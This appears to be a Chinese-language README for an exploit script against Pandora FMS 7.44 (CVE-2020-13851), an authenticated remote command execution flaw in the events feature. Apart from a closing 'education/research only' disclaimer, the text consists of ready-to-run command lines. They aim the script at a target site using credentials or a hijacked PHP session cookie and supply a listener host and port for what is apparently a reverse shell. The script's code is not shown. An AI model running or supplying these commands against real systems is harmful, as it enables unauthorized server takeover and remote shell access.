Pandora FMS 7.44 CVE-2020-13851 RCE 允许经过身份验证的用户通过事件功能实现远程命令执行。可以使用凭据或 PHP 会话 cookie 进行操作。
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
帮助菜单
python3 pandorafms_7.44.py -h
本仓库中提供的所有代码仅供教育/研究目的使用。与本仓库中包含的材料相关的任何行为和/或活动均由您自行负责。滥用本仓库中的代码可能导致相关人员面临刑事指控。对于任何因滥用本仓库代码违反法律而面临刑事指控的个人,作者不承担任何责任。